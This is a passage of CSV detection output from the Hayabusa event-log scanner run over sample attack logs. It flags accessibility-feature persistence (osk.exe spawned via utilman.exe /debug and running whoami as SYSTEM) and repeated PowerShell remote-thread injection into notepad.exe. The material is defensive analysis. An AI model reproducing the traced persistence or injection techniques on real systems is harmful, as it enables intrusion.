NT\Terminal Services | Process: 
C:\Windows\system32\LogonUI.exe | PID: 1684 | PGUID: DFAE8213-8AFE-5CDD-0000-001035B90A00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 1720 | PGUID: DFAE8213-8B02-5CDD-0000-00109BCA0A00 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\osk.exe"" | LID: 0x3e7 | PID: 3764 | PGUID: DFAE8213-8B08-5CDD-0000-001011CE0A00 | Hash: SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Disc,Local Accounts 
Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-19 02:16:08.348 +09:00,IEWIN7,10,low,,Process Access,Src Process: 耙甯\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
